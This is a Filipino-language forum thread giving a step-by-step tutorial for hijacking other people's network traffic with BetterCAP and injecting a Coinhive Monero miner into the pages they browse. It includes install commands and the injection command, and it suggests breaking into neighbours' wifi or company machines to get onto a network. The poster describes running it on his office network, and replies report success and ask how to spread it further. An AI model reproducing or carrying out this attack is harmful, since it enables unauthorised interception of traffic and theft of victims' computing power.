What's new
Symbianize Forum

Most of our features and services are available only to members, so we encourage you to login or register a new account. Registration is free, fast and simple. You only need to provide a valid email. Being a member you'll gain access to all member forums and features, post a message to ask question or provide answer, and share or find resources related to mobile phones, tablets, computers, game consoles, and multimedia.

All that and more, so what are you waiting for, click the register button and join us now! Ito ang website na ginawa ng pinoy para sa pinoy!

BetterCAP (Man in the Middle) + Coinhive (Monero JavaScript Mining)

Status
Not open for further replies.
Android 20

Android 20

The Fanatic
Advanced Member
Messages
419
Reaction score
0
Points
26
I DID NOT POST THIS TO "WEBOFFERS" SIMPLY BECAUSE I WANT TO LEARN NOT EARN!

Na curious lang ako about dito Is The Pirate Bay’s In-Browser Cryptocurrency Mining Better Than Its Crappy Ads?. So ayun i tinry ko lang gamit ang BetterCAP (Man in the Middle) + Coinhive (Monero JavaScript Mining).

What is MitM? wikipedia

Scenario:
Kapag nakakonek tayo sa isang network (home network, pulic wifi, network ng kapitbahay, lan sa compshop, network sa office/school), e spoof natin ung router/switch nila, kumbaga kunwari tayo ung swith/router nila, then satin dadaan ung mga packets or network traffic nila, then once na nag browse sila sa internet or nagrequest sila ng website, e iinject natin ung javascript natin, then bawat visit nila sa website e, nag ma-mine sila para sa atin.

Requirements:
  • access to target network
  • macOS or GNU/Linux (any)
    • macOS X 10.10.3 (dito ko talaga dineploy, eto kasi pinaka accessible at availabe na unit sa target network ko e)
    • ubuntu 16.04 (tried, tested and recommended)
    • vmware + ubuntu 16.04 (make sure lang na bridged ung network connection sa physical network)
    • kali (not tested but will probably work, i do not recommend using kali, why? spoonfeed? pano ka matututo kung puro spoonfeed?)
  • ruby (one of my favorite programming language, make sure installed na, kung hindi pa see this link)
  • javascript miner (download here)
Instruction:
1.Install betterCAP
Code: 
sudo apt-get install build-essential ruby-dev libpcap-dev
gem install bettercap
2. Signup ka muna sa coinhive https://coinhive.com/account/signup
2. Verify your account. Just follow the instructions.
3. Go to Settings > Sites & API Keys https://coinhive.com/settings/sites
4. Copy mo ung public key.
5. Download mo ung script. Edit mo then paste mo ung key mo dun.
6. Gain access to your target network.
Kung kapit bahay mo yan, try mo e hack ung wifi nila gamit ung fluxion. Kung may computer shop ka, mas ok edi kapag nag browse lang sila sa internet dun lang sila nag mamine. Kung malaking company yan, e hack mo isang unit nila, tapos dun mo e deploy. Kung gusto mo bili ka pa ng raspberry pi, dun mo e deploy. Bahala ka kung pano, basta meron kang access sa target network mo.
Click to expand...
7. Inject natin ung script sa mga websites na bibisitahin ng mga target natin.
Code: 
sudo bettercap --proxy-module injectjs --js-file miner.js

Conclusion:
Nung nag test muna ako sa bahay / sariling network. Sa unit ko na amd a6, average 7-10 h/s. Kung i7 mas mataas hash rate nyan syempre.
Sa office namen, meron kaming around 25-30 units cguro. Ung expected ko around 200-300 h/s. Kaso average lang ay 70-100 h/s. Syempre, hindi naman pala sila lahat laging nag babrowse sa internet at kalahati cguro ng mga unit namin 10 years old na. Tinry ko lang sa office ng isang oras ne, since IT naman ako dun, pd ko naman sabihin na tinetest ko lang security ng system namin, kahit baba lang sahod ko dun, mahal ko parin company namin haha. USE ONLY ON NETWORKS YOU OWN / AUTHORIZED. ELSE USE AT YOUR OWN RISK.

Screenshot:
View attachment 327158

domo arigato!

Feedbacks:
joeker31 said:
OKAY na sir. napagana ko na. hindi ko ma install yung bettercap sa 17.
hindi ko rin na copy yung error. pero nag downgrade ulit ak osa 16LTS. gumana xa.

salamat ulit sa share. Keep it Up
Click to expand...
alexisrequerman said:
Thanks sa info TS! Working sa website ko!

View attachment 1226644View attachment 1226644
View attachment 1226645
Click to expand...

Hit Thanks!​
 

Attachments

  • 7412d3e604e0648651bc4bb3f9fb2bf8.gif
    7412d3e604e0648651bc4bb3f9fb2bf8.gif
    23.9 KB · Views: 1,642
  • Screenshot_20171004_122934.jpg
    Screenshot_20171004_122934.jpg
    136.3 KB · Views: 404
Last edited:
salamat sa share TS. pero hindi working sa ubuntu 17.

try ko munang ifix kung kaya.

sana mag response ka. hehe
 
joeker31 said:
salamat sa share TS. pero hindi working sa ubuntu 17.

try ko munang ifix kung kaya.

sana mag response ka. hehe
Click to expand...

alin yung hindi nagwowork?
installation? anu error? have you installed ruby?
script? you can see on the console on the developers tools sa browser ang hashrate per unit.
 
Last edited:
salamat sa info. subukan ko din ito. up up up
 
OKAY na sir. napagana ko na. hindi ko ma install yung bettercap sa 17.
hindi ko rin na copy yung error. pero nag downgrade ulit ak osa 16LTS. gumana xa.

salamat ulit sa share. Keep it Up
 
joeker31 said:
OKAY na sir. napagana ko na. hindi ko ma install yung bettercap sa 17.
hindi ko rin na copy yung error. pero nag downgrade ulit ak osa 16LTS. gumana xa.

salamat ulit sa share. Keep it Up
Click to expand...

thanks for the feedback :)
 
good day, interesting po yan, hmmm, naka magkano ka sa isang araw po dyan boss? :-)
 
gagana kaya ko sa mobile phones boss? i mean yong target natin is naka cellphone lang?
 
Ts pwde po cp gamit medyo mahina ako maka pick up sorry.
 
di ko makuha ng ayos, naguguluhan ako. may shop ako ano example naka connect na ko sa shop ko sa laptop ko ako magdedeploy, kelangan ba hndi ko papatayin ang laptop ko? pag ba pinatay ko magtutuloy tuloy padin pagmine?
 
kymgerald said:
di ko makuha ng ayos, naguguluhan ako. may shop ako ano example naka connect na ko sa shop ko sa laptop ko ako magdedeploy, kelangan ba hndi ko papatayin ang laptop ko? pag ba pinatay ko magtutuloy tuloy padin pagmine?
Click to expand...

kelangan ba hindi ko papatayin ang laptop ko? yes, dapat hindi, para lagi siyang nagiinject ng miner.
pag ba piatay ko magtutuloy padin pagmine? yes and no! YES, basta hindi pa kino-close ng victim ung site na nainject pero NO kapag wala ng nagininject syempre.
 
very nice and informative po.
i will try learning bettercap's basic commands .
 
pwede po ba sir magawa or magawan ng paraan yan kahit naka admin yung mga pc sa office namin? mga it lang kasi may access .. thanks po
 
Status
Not open for further replies.

Similar threads

puchoy
FREE Pi coin when you download app - 10M KYC'ed and 50m playstore downloads na - Pi Network will Open Mainnet in June 28 2024? new BTC daw?
Replies
0
Views
124
puchoy
puchoy
safedie
Help i7 10700 or 10700k?
Replies
2
Views
207
safedie
safedie
maysahodna
Share ko lang crypto experience ko..
Replies
3
Views
989
PH-Maton
P
HHubs
[UPDATE] Siargao trip Nov 2023
Replies
7
Views
508
HHubs
HHubs
gerc018
BTC FREE MINING (tried and tested)
Replies
3
Views
1K
gerc018
gerc018
Back
Top Bottom